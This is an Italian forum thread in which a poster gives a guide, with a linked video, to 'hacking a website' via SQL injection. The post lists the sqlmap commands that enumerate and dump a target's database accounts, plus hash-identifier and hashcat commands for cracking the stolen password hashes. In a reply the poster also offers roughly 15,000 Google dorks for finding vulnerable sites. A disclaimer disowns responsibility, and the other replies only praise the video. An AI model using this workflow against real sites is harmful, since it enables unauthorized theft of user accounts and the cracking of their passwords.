The Best Geek Forum

Hackerare un database | Sql Injection - SqlMap

Le basi dell'Etica Hacker raccolte in una rubrica che descrive la terminologia di essa prendendo spunto da diversi libri e fatti accaduti.

Moderatore: Moderatore in prova

Salve forum,

Oggi vedremo come hackerare un sito web, prelevandone tutti i vari account con le password criptate, poi saranno decriptate ovviamente, con la tecnica dell'Sql Injection.

I requisiti minimi (non presenti nel video) per questa guida sono:


·Conoscenza minima, sulla manipolazione delle query sql.
·Conoscenza minima sui database, e il loro funzionamento.
·Un s.o dedicato al pentesting
·Un'elevata responsabilità rispetto ai contenuti riportati.
Consigliato:
·Conoscenza del linguaggio SQL.


http://www.dailymotion.com/video/x3ixe8e

Codice: Seleziona tutto


Comandi utilizzati per estrarre tutte le info sugli account dal database con il tool sqlmap in linux + bruterforce delle password con hashcat
----------------------------------------------------------------------------------------------------------------
sqlmap -u http://url.sito/query_sql --dbs
sqlmap -u http://url.sito/query_sql -D database_name --tables
sqlmap -u http://url.sito/query_sql -D database_name -T nome_tabella --columns
sqlmap -u http://url.sito/query_sql -D database_name -T nome_tabella --dump
(potete specificare la colonna con il parametro -c nome_colonna prima di --dump)
----------------------------------------------------------------------------------------------------------------
hash-identifier

Hash: copiare una delle password in hash per identificarne il tipo
----------------------------------------------------------------------------------------------------------------
HashCat
hashcat -m numero_codifica -a 0 /percorso/file/contente/password.hash /percorso/contente/la/worlist.txt

Google Dorks
 ! Messaggio da: Virgula
Attenzione!

Non mi avvalgo della responsabilità dei danni che potreste causare con le informazioni riportate nel video.
Usa questa guida per puro scopo informativo e per una cultura personale sulle vulnerabilità!.

Grazie
Bene, bravo, peccato per il suono di sottofondo del video, troppo pesante per i miei gusti, usa roba più delicata, per chi si fa trascinare dalla musica, il contenuto non lo percepisce al 100%. Ti consiglio musiche di anni 80 e 90 da discoteca, più orecchiabili e meno invasive ;) Per il resto molto bravo :)

MM
Michele Mignogna ha scritto:Bene, bravo, peccato per il suono di sottofondo del video, troppo pesante per i miei gusti, usa roba più delicata, per chi si fa trascinare dalla musica, il contenuto non lo percepisce al 100%. Ti consiglio musiche di anni 80 e 90 da discoteca, più orecchiabili e meno invasive ;) Per il resto molto bravo :)

MM
Aahahahahah grazie Michele
Ho raccolto circa 15000 google dorks, ovvero le stringhe che servono per cercare i siti con vulnerabilità sql injection sul motore di ricerca google.
Sono disponibili a questo link: Google Dorks